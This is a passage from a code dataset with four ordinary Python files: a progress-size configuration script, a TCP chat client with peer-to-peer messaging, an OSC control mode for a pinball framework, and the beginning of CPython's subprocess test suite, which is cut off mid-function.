source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
change_progress_size.py | # coding=utf-8
import sys
import threading
import api_server
import progress_data
import utilities
# Default progress-indicator sizes sent to the display server.
# NOTE(review): units are presumably normalised display units — confirm
# against the renderer behind api_server.
DEFAULT_PROGRESS_SIZE_CIRCULAR = 0.32
DEFAULT_PROGRESS_SIZE_LINEAR = 0.40
# The circular size doubles as the overall default (used by the 'r' reset path).
DEFAULT_PROGRESS_SIZE = DEFAULT_PROGRESS_SIZE_CIRCULAR
DEFAULT_PROGRESS_DEPTH = 1.6
# Handle to the background API-server thread; set by start_server_threaded().
server_thread = None
def start_server_threaded():
    """Run api_server.start_server on a background daemon thread.

    The thread handle is kept in the module-level ``server_thread`` so that
    stop_server_threaded() can join it later. The thread is a daemon, so it
    will not block interpreter shutdown on its own.
    """
    global server_thread
    server_thread = threading.Thread(
        target=api_server.start_server,
        daemon=True,
    )
    server_thread.start()
def stop_server_threaded():
    """Wait (bounded) for the background server thread to finish.

    Fix: the original unconditionally called ``server_thread.join(...)`` and
    raised AttributeError if the server was never started (``server_thread``
    is None). There is no shutdown hook for api_server visible here, so the
    best we can do is give the daemon thread a grace period: join(timeout=6)
    returns after at most 6 seconds even if the thread is still running.
    """
    global server_thread
    if server_thread is not None:
        server_thread.join(timeout=6)
        # Drop the handle so a repeated call is a harmless no-op.
        server_thread = None
# --- interactive driver ------------------------------------------------------
# Starts the API server, then loops reading single-letter commands from stdin
# until 'n' is entered, sending progress updates to the server for each one.
start_server_threaded()
print("starting server")
# utilities.sleep_seconds(1)
api_server.update_server_data(progress_data.get_start_progress_data('configure'))
_type = ''
while _type != 'n':
    # Commands: 'l' linear size, 'c' circular size, 's' both sizes,
    # 'd' depth, 'r' reset, 'n' quit.
    # NOTE(review): the prompt omits 's' even though it is accepted below.
    _type = input("Continue? (c/l/d/r/n)")
    if _type == 'l' or _type == 'c' or _type =='s' or _type == 'd':
        _size = input('size:')
        size = float(_size)
        progress = progress_data.get_start_progress_data(_type, _size)
        if _type == 'l':
            # Linear: apply the requested size, keep circular at its default.
            progress_data.add_change_size(progress, size, DEFAULT_PROGRESS_SIZE_CIRCULAR)
        if _type == 'c':
            # Circular: keep linear at its default, apply the requested size.
            progress_data.add_change_size(progress, DEFAULT_PROGRESS_SIZE_LINEAR, size)
        if _type == 's':
            # Both dimensions get the requested size.
            progress_data.add_change_size(progress, size, size)
        if _type == 'd':
            progress_data.add_change_depth(progress, size)
        # send with configuration
        api_server.update_server_data(progress)
        # send without configuration
        api_server.update_server_data(progress_data.get_start_progress_data(_type, _size))
    if _type == 'r':
        # Reset size and depth back to their defaults, one update each.
        progress = progress_data.get_start_progress_data('reset size', f'{DEFAULT_PROGRESS_SIZE:.2f}')
        progress_data.add_change_size(progress, DEFAULT_PROGRESS_SIZE_LINEAR, DEFAULT_PROGRESS_SIZE_CIRCULAR)
        api_server.update_server_data(progress)
        progress = progress_data.get_start_progress_data('reset depth', f'{DEFAULT_PROGRESS_DEPTH:.2f}')
        progress_data.add_change_depth(progress, DEFAULT_PROGRESS_DEPTH)
        api_server.update_server_data(progress)
api_server.update_server_data(progress_data.get_start_progress_data('default'))
# utilities.sleep_seconds(3)
print("stopping server")
stop_server_threaded()
|
client.py | """
Python 3
Usage: python3 TCPClient3.py localhost 12000
coding: utf-8
"""
from socket import *
from threading import Thread
import sys
import threading
import readline
import time
# Thread-safe console printer: erases the line currently being typed before
# writing, so output from background threads does not garble the input prompt.
# Reference: https://stackoverflow.com/a/4653306/12208789
def safe_print(*args):
    """Print *args* without clobbering the user's in-progress readline input."""
    blank = '\r' + ' ' * (len(readline.get_line_buffer()) + 2) + '\r'
    sys.stdout.write(blank)
    print(*args, end="")
    sys.stdout.flush()
    # Brief pause gives the terminal time to settle between competing writers.
    time.sleep(0.1)
# This function creates a private messaging receiver which is listening to incoming
# messages at the given socket and will act correspondingly to the user.
def getPrivateMessageReceiver(p2pSocket):
    # Factory: returns a closure bound to p2pSocket, suitable as a Thread target.
    def privateMessageReceiver():
        while True:
            data = p2pSocket.recv(1024).decode()
            if "['EXIT']" in data:
                # Peer is tearing down the session. If the message is not yet
                # acknowledged with ['END'], echo an ['END']-tagged copy back
                # so the other side closes too.
                if "['END']" not in data:
                    message = data.split()
                    # assumes layout "['EXIT'] <peerName> <otherName> ..." — TODO confirm against senders
                    message = message[0] + " " + message[2] + " ['END']"
                    peerSocketList[data.split()[1]].send(message.encode())
                    time.sleep(0.1)
                # Close both directions and forget this peer in the registries.
                peerSocketList[data.split()[1]].close()
                peerSocketList.pop(data.split()[1])
                p2pSocket.close()
                peerListeningList.pop(data.split()[1])
                clientName = data.split()[1]
                # Fourth token 'True' marks an inactivity-triggered shutdown.
                if len(data.split()) > 3 and data.split()[3] == 'True':
                    safe_print(f"Private messaging with {clientName} closed due to inactivity\n")
                else:
                    safe_print(f"Private messaging with {clientName} closed\n")
                break
            else:
                # Ordinary private message: just display it.
                safe_print(data + '\n')
    return privateMessageReceiver
# This function listens to port which designated to P2P connections for incoming
# network. If a peer is trying to connect to this port to initiate private messaging,
# the function will accept the connection, start a thread with the private socket for
# communication, and add the thread to the peerListeningList for future utilisation.
def privateReceiveConnector():
    # Runs forever on its own daemon thread; one accept per incoming peer.
    while True:
        p2pSocket, p2pAddress = p2pMessagingSocket.accept()
        privateReceiver = getPrivateMessageReceiver(p2pSocket)
        privateSocketThread = threading.Thread(target=privateReceiver)
        privateSocketThread.daemon = True
        privateSocketThread.start()
        # NOTE(review): keys on the global p2pClient set by messageReceiver;
        # if two peers connect in quick succession this may record the wrong
        # name — verify the server serialises connection handshakes.
        peerListeningList[p2pClient] = p2pSocket
# This function handles the start of a private messaging connection if requested
# by the client. The function starts a p2p connection correspondingly and possibly
# ask if the user is willing to start p2p and act correspondingly.
def startNewPrivateConnection(userName, targetIp, targetPort, flag):
    global allowPrivate
    # Dial the peer's private-messaging listener directly (TCP).
    newPeerSocket = socket(AF_INET, SOCK_STREAM)
    newPeerSocket.connect((targetIp, int(targetPort)))
    # flag == 'False' means this side did not initiate the session, so ask
    # the local user for consent; messageSender handles the y/n answer while
    # allowPrivate is set.
    if (flag == 'False'):
        safe_print(f"{userName} would like to private message, enter y or n: ")
        allowPrivate = True
    peerSocketList[userName] = newPeerSocket
# This function handles the message being sent to the client. The function will
# decode the message, understand the command, and act correspondingly.
def messageReceiver():
    global terminate, userName, p2pClient
    # Runs forever on its own daemon thread, draining the server socket.
    while True:
        data = clientSocket.recv(1024).decode()
        if "['EXIT']" in data:
            # Server ordered a shutdown: show the message minus the marker,
            # ack the server, and notify every private peer we are leaving.
            safe_print(data[:-8])
            clientSocket.send("".encode())
            for peer in peerSocketList:
                peerSocketList[peer].send(f"['EXIT'] {userName} {peer} True".encode())
            terminate = True
        elif "['TARGET']" in data:
            # Server is brokering a p2p session:
            # assumed layout "['TARGET'] <peerName> <ip> <port> <ourName> <flag>" — TODO confirm server side
            data = data.split()
            p2pClient = data[1]
            userName = data[4]
            startNewPrivateConnection(p2pClient, data[2], data[3], data[5])
        else:
            # Anything else is plain chat output from the server.
            safe_print(data)
# This function handles the messages being send from the user. All messages will be
# directed to the server unless the user wishes to privately message a peer or stop
# a private messaging session.
def messageSender():
    """Read user input forever and route it to the server or a private peer.

    Commands: "logout" ends the session; "private <user> <msg>" sends a p2p
    message; "stopprivate <user>" tears a p2p session down. While the
    allowPrivate flag is set, the input is instead treated as the y/n answer
    to a pending private-messaging request.

    Fix: in the decline branch the original sent the EXIT notice through
    peerSocketList[message[1]], but in that branch `message` is still the raw
    input string (e.g. 'n'), so message[1] is a character index — the socket
    to tear down is the requesting peer's, keyed by p2pClient.
    """
    global terminate, allowPrivate, userName
    while True:
        message = input()
        if message.lower() == "logout":
            # Tell every private peer we are leaving, then signal the server.
            for peer in peerSocketList:
                peerSocketList[peer].send(f"['EXIT'] {userName} {peer}".encode())
            clientSocket.send("".encode())
            terminate = True
        elif allowPrivate:
            # The input answers a pending p2p request; '['0']' keeps the
            # server's per-message protocol in step.
            clientSocket.send("['0']".encode())
            if message == 'y':
                peerSocketList[p2pClient].send(f"{userName} accepts private messaging".encode())
            else:
                peerSocketList[p2pClient].send(f"{userName} declines private messaging".encode())
                time.sleep(0.1)
                # BUG FIX: was peerSocketList[message[1]] — see docstring.
                peerSocketList[p2pClient].send(f"['EXIT'] {userName} {p2pClient}".encode())
            allowPrivate = False
        else:
            message = message.split()
            if len(message) >= 2 and message[0] == "private":
                messageToSend = ' '.join(message[2:])
                messageToSend = f"{userName}(private): " + messageToSend
                if message[1] in peerSocketList:
                    clientSocket.send("['0']".encode())
                    peerSocketList[message[1]].send(messageToSend.encode())
                else:
                    safe_print(f"Error. Private messaging to {message[1]} not enabled\n")
            elif len(message) == 2 and message[0] == "stopprivate":
                if message[1] in peerSocketList:
                    clientSocket.send("['0']".encode())
                    peerSocketList[message[1]].send(f"['EXIT'] {userName} {message[1]}".encode())
                else:
                    safe_print(f"Error. Cannot stop an inexist private session with {message[1]}\n")
            else:
                # Plain chat: forward the (re-joined) input to the server.
                clientSocket.send(' '.join(message).encode())
"""
Main execution code of the client
"""
# Verify if sufficient information have been provided by the command line. Proceed
# if sufficient. Print out error and stop execution otherwise.
if len(sys.argv) != 2:
print("\n===== Error usage, python3 TCPClient3.py SERVER_PORT ======\n");
exit(0);
# Acquire serverPort from command line parameter. serverHost have been set to
# localhost, 127.0.0.1, by default. This may be changed for later usage.
# ### Change this line of code if you wish to communicate between different computers.
serverHost = 'localhost'
serverPort = int(sys.argv[1])
serverAddress = (serverHost, serverPort)
# Initialise tracking variables to default. terminate determines if the program needs
# to be terminated, userName keeps track of the userName of the current client.
# p2pClient keeps track of the userName of the p2pClient, and allowPrivate is a flag
# signaling the messageSender if the input is a proper user command or a p2p connection
# decision.
terminate = False
userName = None
p2pClient = ''
allowPrivate = False
# Define socket for the client side and connect the socket to the server.
clientSocket = socket(AF_INET, SOCK_STREAM)
clientSocket.connect(serverAddress)
# Define socket for private messaging, bind the address, and listen to the port for
# connectivity purposes. Additionally, the private messaging port would be obtained
# to notify the server and allow peers have correct port number for private messaging
# connection.
p2pMessagingSocket = socket(AF_INET, SOCK_STREAM)
p2pMessagingSocket.bind(("localhost", 0))
p2pMessagingSocket.listen(1)
p2pMessagingPort = p2pMessagingSocket.getsockname()[1]
clientSocket.send(f"['p2pPort'] {p2pMessagingPort}".encode())
'''
Definition of client side data structure
'''
# The peerSocketList keeps track of the users who have initiated private messaging
# with the client and their corresponding sockets, which would be used to send private
# messages to the user. The peerSocketList is a dictionary in the following format:
# {userNameA: socketA, userNameB: socketB, ...}
peerSocketList = {}
# The peerListeningList keeps track of the users who have initiated private messaging
# with the client and their corresponding listening sockets, which would be responsible
# for receving privates messages from the user. The peerListeningList is a dictionary
# in the following format: {userNameA: socketA, userNameB: socketB, ...}
peerListeningList = {}
# Creates a new thread to handle messages send to the client from the server.
receiverHandler = Thread(name="receiver", target = messageReceiver)
receiverHandler.daemon = True
receiverHandler.start()
# Creates a new thread to handle messages send from the client, including messages
# send to the server and peer via private messaging.
sendHandler = Thread(name="sender", target = messageSender)
sendHandler.daemon = True
sendHandler.start()
# Creates a new thread to listen for private messaging connection, connect if another
# user wishes to start p2p connection with the client.
privateReceiver = Thread(name="privateReceiver", target = privateReceiveConnector)
privateReceiver.daemon = True
privateReceiver.start()
# Main execution loop: park the main thread until a worker thread (receiver
# or sender) sets `terminate`, then exit the process. The short sleep keeps
# this wait from busy-spinning a full CPU core — the original polled the flag
# as fast as the interpreter could loop.
while True:
    if terminate:
        exit(0)
    time.sleep(0.1)
|
osc.py | import procgame.game
from procgame.game import Mode
import OSC
import socket
import threading
import pinproc
class OSC_Mode(Mode):
    """This is the awesome OSC interface. A few parameters:
    game - game object
    priority - game mode priority. It doesn't really matter for this mode.
    serverIP - the IP address the OSC server will listen on. If you don't pass it anything it will use the default IP address of your computer which should be fine
    serverPort - the UDP port the server will listen on. Default 9000
    clientIP - the IP address of the client you'd like to connect to. Leave it blank and it will automatically connect to the first client that contacts it
    clientPort - the client UDP port. Default is 8000
    closed_switches - a list of switch names that you'd like to have set "closed" by default. Good for troughs and stuff. Maybe use some logic here so they're only set to closed with fakepinproc?
    """

    def __init__(self, game, priority, serverIP=None, serverPort=9000, clientIP=None, clientPort=8000, closed_switches=None):
        super(OSC_Mode, self).__init__(game, priority)
        self.serverPort = serverPort
        self.clientPort = clientPort
        # FIX: the original used a mutable default argument (closed_switches=[]),
        # which is shared between every instance created without the argument.
        # A None sentinel with a fresh list per instance is backward-compatible.
        self.closed_switches = closed_switches if closed_switches is not None else []
        if not serverIP:
            # Default to this machine's resolved IP address.
            self.serverIP = socket.gethostbyname(socket.gethostname())
        else:
            self.serverIP = serverIP
        self.clientIP = clientIP
        self.client_needs_sync = False
        self.do_we_have_a_client = False

    def mode_started(self):
        """Bring up the OSC server on its own thread and seed initial switches."""
        receive_address = (self.serverIP, self.serverPort)  # create a tuple from the IP & UDP port
        self.server = OSC.OSCServer(receive_address)
        self.server.addDefaultHandlers()
        # Route every otherwise-unhandled OSC address to our switch handler.
        self.server.addMsgHandler("default", self.PROC_OSC_message_handler)
        # start the OSC server
        self.game.logger.info("OSC Server listening on %s:%s", self.serverIP, self.serverPort)
        self.server_thread = threading.Thread(target=self.server.serve_forever)
        self.server_thread.start()
        self.set_initial_switches()

    def mode_stopped(self):
        self.OSC_shutdown()

    def OSC_shutdown(self):
        """Shuts down the OSC Server thread. If you don't do this python will hang when you exit the game."""
        self.server.close()
        self.game.logger.info("Waiting for the OSC Server thread to finish")
        self.server_thread.join()
        self.game.logger.info("OSC Server thread is done.")

    def PROC_OSC_message_handler(self, addr, tags, data, client_address):
        """ receives OSC messages and acts on them by setting switches."""
        # need to add supprt for "sync" instruction which we'll call when switching tabs in touchOSC
        # Strip out the switch name: `addr` is the OSC address (not an IP);
        # take the characters after the final "/".
        switchname = addr.split("/")[-1]
        if switchname in self.game.switches:
            switch_number = self.game.switches[switchname].number
        else:
            switch_number = pinproc.decode(self.game.machine_type, switchname)
        # I'm kind of cheating by using desktop.key_events here, but I guess this is ok?
        if data[0] == 1.0:  # close the switch
            self.game.desktop.key_events.append({'type': pinproc.EventTypeSwitchClosedDebounced, 'value': switch_number})
        elif data[0] == 0.0:  # open the switch
            self.game.desktop.key_events.append({'type': pinproc.EventTypeSwitchOpenDebounced, 'value': switch_number})
        # since we just got a message from a client, let's set up a connection to it
        if not self.do_we_have_a_client:
            if not self.clientIP:  # if a client IP wasn't specified, use the one that just communicated with us now
                self.clientIP = client_address[0]
            self.clientTuple = (self.clientIP, self.clientPort)
            self.setup_OSC_client(self.clientTuple)

    def sync_client(self, OSC_branch=1):
        """ Read through all the current switch states and updates the client to set the default states on the client.
        Since we don't know whether the client has momentary or toggle switches, we just have to update all of them.
        """
        for switch in self.game.switches:
            status = 0.0  # set the status to 'off'
            if switch.state:
                status = 1.0  # if the switch.state is 'True', the switch is closed
            self.update_client_switch(switch.name, status, OSC_branch)
        self.client_needs_sync = False  # since the sync is done we reset the flag

    def update_client_switch(self, switch_name, status, OSC_branch=1):
        """update the client switch states.
        Parameters
        switch_name - the procgame switch name
        status - closed = 1, open = 0
        OSC_branch - what OSC branch do you want? For TouchOSC, this defaults to the "tab"
        The screen is the /1/ or /2/ or whatever part of the OSC address
        """
        if self.do_we_have_a_client:  # only do this if we have a client
            # Let's build a message. For example OSC address "/1/switchname" with data "1"
            self.OSC_message = OSC.OSCMessage()
            self.OSC_message.setAddress("/" + str(OSC_branch) + "/" + switch_name)
            self.OSC_message.append(status)
            self.OSC_client.send(self.OSC_message)
        else:  # we don't have a client?
            self.do_we_have_a_client = False

    def setup_OSC_client(self, address):
        """Connect an OSC client to *address* (an (ip, port) tuple)."""
        self.OSC_client = OSC.OSCClient()
        self.OSC_client.connect(address)
        self.do_we_have_a_client = True

    def set_initial_switches(self):
        """sets up the initial switches that should be closed, then marks the client to sync
        Should I add some logic here to only do this with fakepinproc?
        """
        if ('pinproc_class' in procgame.config.values and
                procgame.config.values['pinproc_class'] == 'procgame.fakepinproc.FakePinPROC'):
            for switchname in self.closed_switches:  # run through the list of closed_switches passed to the mode as args
                if switchname in self.game.switches:  # convert the names to switch numbers
                    switch_number = self.game.switches[switchname].number
                else:
                    switch_number = pinproc.decode(self.game.machine_type, switchname)
                # add these switch close events to the queue
                self.game.desktop.key_events.append({'type': pinproc.EventTypeSwitchClosedDebounced, 'value': switch_number})
        self.client_needs_sync = True  # Now that this is done we set the flag to sync the client
        # we use the flag because if we just did it now it's too fast. The game loop hasn't read in the new closures yet

    def mode_tick(self):
        """performs a client sync if we need it"""
        if self.do_we_have_a_client:  # only proceed if we've establish a connection with a client
            if self.client_needs_sync:  # if the client is out of sync, then sync it
                self.sync_client()
test_subprocess.py | import unittest
from test import test_support
import subprocess
import sys
import signal
import os
import errno
import tempfile
import time
import re
import sysconfig
try:
import resource
except ImportError:
resource = None
try:
import threading
except ImportError:
threading = None
# True on a native win32 interpreter; several tests below branch on this.
mswindows = (sys.platform == "win32")
#
# Depends on the following external programs: Python
#
#if mswindows:
#    SETBINARY = ('import msvcrt; msvcrt.setmode(sys.stdout.fileno(), '
#                 'os.O_BINARY);')
#else:
#    SETBINARY = ''
# Prefer the race-free tempfile.mkstemp; on interpreters that lack it, fall
# back to the mktemp+open combination (which has a create-time race window).
try:
    mkstemp = tempfile.mkstemp
except AttributeError:
    # tempfile.mkstemp is not available
    def mkstemp():
        """Replacement for mkstemp, calling mktemp."""
        fname = tempfile.mktemp()
        return os.open(fname, os.O_RDWR|os.O_CREAT), fname
class BaseTestCase(unittest.TestCase):
    """Shared setup/teardown and helpers for the subprocess tests below."""

    def setUp(self):
        # Try to minimize the number of children we have so this test
        # doesn't crash on some buildbots (Alphas in particular).
        test_support.reap_children()

    def tearDown(self):
        # Reap any process the test left behind and verify nothing leaked
        # into subprocess's internal bookkeeping list.
        for inst in subprocess._active:
            inst.wait()
        subprocess._cleanup()
        self.assertFalse(subprocess._active, "subprocess._active not empty")

    def assertStderrEqual(self, stderr, expected, msg=None):
        # In a debug build, stuff like "[6580 refs]" is printed to stderr at
        # shutdown time. That frustrates tests trying to check stderr produced
        # from a spawned Python process.
        actual = re.sub(r"\[\d+ refs\]\r?\n?$", "", stderr)
        self.assertEqual(actual, expected, msg)
class PopenTestException(Exception):
    """Deliberately-raised exception used to force Popen failures in tests."""
class PopenExecuteChildRaises(subprocess.Popen):
    """Popen subclass for testing cleanup of subprocess.PIPE filehandles when
    _execute_child fails.
    """
    def _execute_child(self, *args, **kwargs):
        # Fail before any child process is spawned, regardless of arguments.
        raise PopenTestException("Forced Exception for Test")
class ProcessTestCase(BaseTestCase):
def test_call_seq(self):
# call() function with sequence argument
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(rc, 47)
def test_check_call_zero(self):
# check_call() function with zero return code
rc = subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(0)"])
self.assertEqual(rc, 0)
def test_check_call_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_call([sys.executable, "-c",
"import sys; sys.exit(47)"])
self.assertEqual(c.exception.returncode, 47)
def test_check_output(self):
# check_output() function with zero return code
output = subprocess.check_output(
[sys.executable, "-c", "print 'BDFL'"])
self.assertIn('BDFL', output)
def test_check_output_nonzero(self):
# check_call() function with non-zero return code
with self.assertRaises(subprocess.CalledProcessError) as c:
subprocess.check_output(
[sys.executable, "-c", "import sys; sys.exit(5)"])
self.assertEqual(c.exception.returncode, 5)
def test_check_output_stderr(self):
# check_output() function stderr redirected to stdout
output = subprocess.check_output(
[sys.executable, "-c", "import sys; sys.stderr.write('BDFL')"],
stderr=subprocess.STDOUT)
self.assertIn('BDFL', output)
def test_check_output_stdout_arg(self):
# check_output() function stderr redirected to stdout
with self.assertRaises(ValueError) as c:
output = subprocess.check_output(
[sys.executable, "-c", "print 'will not be run'"],
stdout=sys.stdout)
self.fail("Expected ValueError when stdout arg supplied.")
self.assertIn('stdout', c.exception.args[0])
def test_call_kwargs(self):
# call() function with keyword args
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
rc = subprocess.call([sys.executable, "-c",
'import sys, os;'
'sys.exit(os.getenv("FRUIT")=="banana")'],
env=newenv)
self.assertEqual(rc, 1)
def test_invalid_args(self):
# Popen() called with invalid arguments should raise TypeError
# but Popen.__del__ should not complain (issue #12085)
with test_support.captured_stderr() as s:
self.assertRaises(TypeError, subprocess.Popen, invalid_arg_name=1)
argcount = subprocess.Popen.__init__.__code__.co_argcount
too_many_args = [0] * (argcount + 1)
self.assertRaises(TypeError, subprocess.Popen, *too_many_args)
self.assertEqual(s.getvalue(), '')
def test_stdin_none(self):
# .stdin is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print "banana"'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
p.wait()
self.assertEqual(p.stdin, None)
def test_stdout_none(self):
# .stdout is None when not redirected, and the child's stdout will
# be inherited from the parent. In order to test this we run a
# subprocess in a subprocess:
# this_test
# \-- subprocess created by this test (parent)
# \-- subprocess created by the parent subprocess (child)
# The parent doesn't specify stdout, so the child will use the
# parent's stdout. This test checks that the message printed by the
# child goes to the parent stdout. The parent also checks that the
# child's stdout is None. See #11963.
code = ('import sys; from subprocess import Popen, PIPE;'
'p = Popen([sys.executable, "-c", "print \'test_stdout_none\'"],'
' stdin=PIPE, stderr=PIPE);'
'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), 'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print "banana"'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def test_executable_with_cwd(self):
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(["somethingyoudonthave", "-c",
"import sys; sys.exit(47)"],
executable=sys.executable, cwd=python_dir)
p.wait()
self.assertEqual(p.returncode, 47)
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
p = subprocess.Popen(["somethingyoudonthave", "-c",
"import sys; sys.exit(47)"],
executable=sys.executable)
p.wait()
self.assertEqual(p.returncode, 47)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write("pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
d = tf.fileno()
os.write(d, "pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
tf.write("pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read(), "orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), "orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), "orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
self.addCleanup(p.stderr.close)
self.assertStderrEqual(p.stderr.read(), "strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertStderrEqual(os.read(d, 1024), "strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), "strawberry")
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
self.addCleanup(p.stdout.close)
self.assertStderrEqual(p.stdout.read(), "appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), "appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), 'test with stdout=1')
def test_cwd(self):
tmpdir = tempfile.gettempdir()
# We cannot use os.path.realpath to canonicalize the path,
# since it doesn't expand Tru64 {memb} strings. See bug 1063571.
cwd = os.getcwd()
os.chdir(tmpdir)
tmpdir = os.getcwd()
os.chdir(cwd)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getcwd())'],
stdout=subprocess.PIPE,
cwd=tmpdir)
self.addCleanup(p.stdout.close)
normcase = os.path.normcase
self.assertEqual(normcase(p.stdout.read()), normcase(tmpdir))
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv)
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.read(), "orange")
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate("pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertStderrEqual(stderr, "pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate("banana")
self.assertEqual(stdout, "banana")
self.assertStderrEqual(stderr, "pineapple")
# This test is Linux specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
fd_directory = '/proc/%d/fd' % os.getpid()
num_fds_before_popen = len(os.listdir(fd_directory))
p = subprocess.Popen([sys.executable, "-c", "print()"],
stdout=subprocess.PIPE)
p.communicate()
num_fds_after_communicate = len(os.listdir(fd_directory))
del p
num_fds_after_destruction = len(os.listdir(fd_directory))
self.assertEqual(num_fds_before_popen, num_fds_after_destruction)
self.assertEqual(num_fds_before_popen, num_fds_after_communicate)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
